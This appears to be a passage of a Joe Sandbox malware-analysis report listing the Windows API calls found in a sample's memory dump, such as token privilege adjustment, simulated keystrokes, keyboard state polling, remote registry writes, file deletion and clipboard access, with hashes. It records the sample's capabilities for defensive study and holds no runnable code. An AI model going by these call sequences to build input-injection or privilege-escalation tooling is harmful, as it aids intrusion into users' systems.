                                                            • GetCurrentThreadId.KERNEL32 ref: 006CD6A2
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 006CD6AE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 006CD6BF
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 006CD6C7
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 006CD6CF
                                                            • SetForegroundWindow.USER32(?), ref: 006CD6D2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CD6E7
                                                            • keybd_event.USER32(00000012,00000000), ref: 006CD6F2
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CD6FC
                                                            • keybd_event.USER32(00000012,00000000), ref: 006CD701
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CD70A
                                                            • keybd_event.USER32(00000012,00000000), ref: 006CD70F
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CD719
                                                            • keybd_event.USER32(00000012,00000000), ref: 006CD71E
                                                            • SetForegroundWindow.USER32(?), ref: 006CD721
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 006CD748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: 24a72c43faadc8a2b3860351b2f6387639e8a8c63017c0eb0c5bb0f40c03a34c
                                                            • Instruction ID: 9a0ae283a7a40b4c7b7e989b073106d9545e76b8c59e4d74ba5e8ba746576cfe
                                                            • Opcode Fuzzy Hash: 24a72c43faadc8a2b3860351b2f6387639e8a8c63017c0eb0c5bb0f40c03a34c
                                                            • Instruction Fuzzy Hash: D031A571A40318BBEB206F658C49FBF7F6DEB44B50F108039FA04EA1D1C6B49C11ABA5
                                                            APIs
                                                              • Part of subcall function 006E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E882B
                                                              • Part of subcall function 006E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8858
                                                              • Part of subcall function 006E87E1: GetLastError.KERNEL32 ref: 006E8865
                                                            • _memset.LIBCMT ref: 006E8353
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006E83A5
                                                            • CloseHandle.KERNEL32(?), ref: 006E83B6
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006E83CD
                                                            • GetProcessWindowStation.USER32 ref: 006E83E6
                                                            • SetProcessWindowStation.USER32(00000000), ref: 006E83F0
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006E840A
                                                              • Part of subcall function 006E81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E8309), ref: 006E81E0
                                                              • Part of subcall function 006E81CB: CloseHandle.KERNEL32(?,?,006E8309), ref: 006E81F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: 900eec6aa2a6e3235d56bee7473fe70d853b72b9c184bbdbbc66c0aa7a62d210
                                                            • Instruction ID: 453b257dfce10ada3f33a4966cd9473a9bdb2e450be80059ba96efb76e28586e
                                                            • Opcode Fuzzy Hash: 900eec6aa2a6e3235d56bee7473fe70d853b72b9c184bbdbbc66c0aa7a62d210
                                                            • Instruction Fuzzy Hash: DB81ADB1801389AFDF51DFA5CC45AEE7BBAEF04304F148129F819A32A1DB358E15DB24
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006FC78D
                                                            • FindClose.KERNEL32(00000000), ref: 006FC7E1
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006FC806
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006FC81D
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 006FC844
                                                            • __swprintf.LIBCMT ref: 006FC890
                                                            • __swprintf.LIBCMT ref: 006FC8D3
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                            • __swprintf.LIBCMT ref: 006FC927
                                                              • Part of subcall function 006B3698: __woutput_l.LIBCMT ref: 006B36F1
                                                            • __swprintf.LIBCMT ref: 006FC975
                                                              • Part of subcall function 006B3698: __flsbuf.LIBCMT ref: 006B3713
                                                              • Part of subcall function 006B3698: __flsbuf.LIBCMT ref: 006B372B
                                                            • __swprintf.LIBCMT ref: 006FC9C4
                                                            • __swprintf.LIBCMT ref: 006FCA13
                                                            • __swprintf.LIBCMT ref: 006FCA62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: 2199967995a199ed6971ea8290230116a1c4c0eb528d98e64b3268833e0c96a6
                                                            • Instruction ID: 9dcc6b428c0dc558884bd54540ebb5b18b442a7508f39838c018311b61f68457
                                                            • Opcode Fuzzy Hash: 2199967995a199ed6971ea8290230116a1c4c0eb528d98e64b3268833e0c96a6
                                                            • Instruction Fuzzy Hash: 29A14EB1504248ABCB40EFA4C985DBFB7EDFF94700F40491DF595C6192EA34EA08CB66
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 006FEFB6
                                                            • _wcscmp.LIBCMT ref: 006FEFCB
                                                            • _wcscmp.LIBCMT ref: 006FEFE2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 006FEFF4
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 006FF00E
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006FF026
                                                            • FindClose.KERNEL32(00000000), ref: 006FF031
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006FF04D
                                                            • _wcscmp.LIBCMT ref: 006FF074
                                                            • _wcscmp.LIBCMT ref: 006FF08B
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006FF09D
                                                            • SetCurrentDirectoryW.KERNEL32(00748920), ref: 006FF0BB
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006FF0C5
                                                            • FindClose.KERNEL32(00000000), ref: 006FF0D2
                                                            • FindClose.KERNEL32(00000000), ref: 006FF0E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 600f8aab46123329b163364c63d56c735c23ccb99688fee809bd67d0a5b5c556
                                                            • Instruction ID: 148928a561900dafabb17749061a677911728a7f971c318737645d7bf5842327
                                                            • Opcode Fuzzy Hash: 600f8aab46123329b163364c63d56c735c23ccb99688fee809bd67d0a5b5c556
                                                            • Instruction Fuzzy Hash: CD31057250161C7ACB24DBB4DC59AFE77AEAF44360F008175E904E22A1DF74DA80CB69
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710953
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0071F910,00000000,?,00000000,?,?), ref: 007109C1
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00710A09
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00710A92
                                                            • RegCloseKey.ADVAPI32(?), ref: 00710DB2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00710DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: 9262ecb7b469f003f8b4be0ef80224e9832c03a1a8eda3521fd7122221e3c711
                                                            • Instruction ID: f79cd8c0046e897afe9a238659e29fde33e70d3c48a3032b06b6b2987e6a7b76
                                                            • Opcode Fuzzy Hash: 9262ecb7b469f003f8b4be0ef80224e9832c03a1a8eda3521fd7122221e3c711
                                                            • Instruction Fuzzy Hash: 990290756006019FCB54EF28C851E6AB7E9FF89310F04895CF8899B7A2DB74EC81CB95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0Ds$0Es$0Fs$3cj$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGs$_j
                                                            • API String ID: 0-1531490153
                                                            • Opcode ID: 64eedf39d7795a0e65930290eb13b9a14885f3954a8fa5b5209e9f71b669c232
                                                            • Instruction ID: 1147d1896a458e32b8301b7d06a0607b874d71b8e1b1f8067ef750942b207bd0
                                                            • Opcode Fuzzy Hash: 64eedf39d7795a0e65930290eb13b9a14885f3954a8fa5b5209e9f71b669c232
                                                            • Instruction Fuzzy Hash: 14726DB5E00259CBDB14DF59C8807EEB7B6BF49310F14816AE905EB291EB349E81DF90
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 006FF113
                                                            • _wcscmp.LIBCMT ref: 006FF128
                                                            • _wcscmp.LIBCMT ref: 006FF13F
                                                              • Part of subcall function 006F4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006F43A0
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 006FF16E
                                                            • FindClose.KERNEL32(00000000), ref: 006FF179
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 006FF195
                                                            • _wcscmp.LIBCMT ref: 006FF1BC
                                                            • _wcscmp.LIBCMT ref: 006FF1D3
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 006FF1E5
                                                            • SetCurrentDirectoryW.KERNEL32(00748920), ref: 006FF203
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006FF20D
                                                            • FindClose.KERNEL32(00000000), ref: 006FF21A
                                                            • FindClose.KERNEL32(00000000), ref: 006FF22C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: 08631ed522110f39436d93167d8b84e1c2a948e6b7385a3ec4b3cbc5b56ca235
                                                            • Instruction ID: 621d3aec2092e1881af9ca1027c6a238d716480cf9297f2a2dd497fcae136cb3
                                                            • Opcode Fuzzy Hash: 08631ed522110f39436d93167d8b84e1c2a948e6b7385a3ec4b3cbc5b56ca235
                                                            • Instruction Fuzzy Hash: 8831037650061D7ADB20EFA4EC49AFE77AE9F45320F104175E900E22E0DB75DF85CA58
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006FA20F
                                                            • __swprintf.LIBCMT ref: 006FA231
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 006FA26E
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006FA293
                                                            • _memset.LIBCMT ref: 006FA2B2
                                                            • _wcsncpy.LIBCMT ref: 006FA2EE
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006FA323
                                                            • CloseHandle.KERNEL32(00000000), ref: 006FA32E
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 006FA337
                                                            • CloseHandle.KERNEL32(00000000), ref: 006FA341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: 7e40606a80ff19631ea1c9564fb731e0951c9a77a9863204a8d87cb586487b4a
                                                            • Instruction ID: 0839b47fca5ee1cf5199bc1d04ad44a0fc2a6bf6afd6c65aed10739392bfccda
                                                            • Opcode Fuzzy Hash: 7e40606a80ff19631ea1c9564fb731e0951c9a77a9863204a8d87cb586487b4a
                                                            • Instruction Fuzzy Hash: A131B5B2500109ABDB20DFA4DC45FFB77BDEF89700F1081B6F608D2260E77496448B29
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 006F0097
                                                            • SetKeyboardState.USER32(?), ref: 006F0102
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 006F0122
                                                            • GetKeyState.USER32(000000A0), ref: 006F0139
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 006F0168
                                                            • GetKeyState.USER32(000000A1), ref: 006F0179
                                                            • GetAsyncKeyState.USER32(00000011), ref: 006F01A5
                                                            • GetKeyState.USER32(00000011), ref: 006F01B3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 006F01DC
                                                            • GetKeyState.USER32(00000012), ref: 006F01EA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 006F0213
                                                            • GetKeyState.USER32(0000005B), ref: 006F0221
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: a3c03796e2caf18652dab14e2ecf41ddf03409109f92bbd6b349df1a00585df3
                                                            • Instruction ID: 919b79feadfc4119318cbe1a0cc6615338be560d87579565ee5fe66e8c8c3772
                                                            • Opcode Fuzzy Hash: a3c03796e2caf18652dab14e2ecf41ddf03409109f92bbd6b349df1a00585df3
                                                            • Instruction Fuzzy Hash: 2151FA3090478C29FB35DBA089547FABFB69F02380F08459DD6C25A2C3DAA49B8CC765
                                                            APIs
                                                              • Part of subcall function 00710E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070FDAD,?,?), ref: 00710E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007104AC
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0071054B
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007105E3
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00710822
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0071082F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: 3d641f9fd1f5562048d9bbc9f67349139c23fbcb6465e1a56c24ecf5762c37f0
                                                            • Instruction ID: 20299613db0dc4561e18ef30b90b813b9bf379bc3d86443e675dcf4fadcc787c
                                                            • Opcode Fuzzy Hash: 3d641f9fd1f5562048d9bbc9f67349139c23fbcb6465e1a56c24ecf5762c37f0
                                                            • Instruction Fuzzy Hash: F1E16F30204200AFCB54DF28C895E6ABBE9FF89314F04C96DF849DB2A1D674ED81CB95
                                                            APIs
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                            • CoInitialize.OLE32 ref: 00708403
                                                            • CoUninitialize.OLE32 ref: 0070840E
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00722BEC,?), ref: 0070846E
                                                            • IIDFromString.OLE32(?,?), ref: 007084E1
                                                            • VariantInit.OLEAUT32(?), ref: 0070857B
                                                            • VariantClear.OLEAUT32(?), ref: 007085DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 834269672-1287834457
                                                            • Opcode ID: c4776a78f582a51a285deab7c24d53fdf1111b1404b2eb92c6dfd543bbbad3b1
                                                            • Instruction ID: 590fbc59d545a34dbd146932d922b01fb2b72f335ba58be9623b42aca171a148
                                                            • Opcode Fuzzy Hash: c4776a78f582a51a285deab7c24d53fdf1111b1404b2eb92c6dfd543bbbad3b1
                                                            • Instruction Fuzzy Hash: 9D619A70608312DFC790DF24C849B6AB7E9AF49714F044A1DF9819B291DB78ED48CBA7
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: 9d19e7ec8ed4ebc1c7ca6884344f2ad81b06054b278ef8a4e4e620227bd48bca
                                                            • Instruction ID: 9638645491b7b4691bc721a94591aeeda3bc8eeda2644b1fad9407f6fb9c5a0c
                                                            • Opcode Fuzzy Hash: 9d19e7ec8ed4ebc1c7ca6884344f2ad81b06054b278ef8a4e4e620227bd48bca
                                                            • Instruction Fuzzy Hash: 0C217C752002149FDB10AF28DC09BAD7BA9FF45751F10C12AFA469B2A1DB78A8008B58
                                                            APIs
                                                              • Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770
                                                              • Part of subcall function 006F4A31: GetFileAttributesW.KERNEL32(?,006F370B), ref: 006F4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006F38A3
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 006F394B
                                                            • MoveFileW.KERNEL32(?,?), ref: 006F395E
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 006F397B
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 006F399D
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 006F39B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: f5e1fa3353a021dc3ce15854ac14fe9b3ff48ffbf6b3a82121ca2445e5fdbd67
                                                            • Instruction ID: e2de8a64fc3d2629fff3264851573f5b045fcf890d25cdc701f75849a23c79b0
                                                            • Opcode Fuzzy Hash: f5e1fa3353a021dc3ce15854ac14fe9b3ff48ffbf6b3a82121ca2445e5fdbd67
                                                            • Instruction Fuzzy Hash: 4E51AD3180515DAACF45EBA0CA92DFDB77AAF10300F60406DE506B7292EF716F09CB68
                                                            APIs
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 006FF440
                                                            • Sleep.KERNEL32(0000000A), ref: 006FF470
                                                            • _wcscmp.LIBCMT ref: 006FF484
                                                            • _wcscmp.LIBCMT ref: 006FF49F
                                                            • FindNextFileW.KERNEL32(?,?), ref: 006FF53D
                                                            • FindClose.KERNEL32(00000000), ref: 006FF553
                                                            Strings
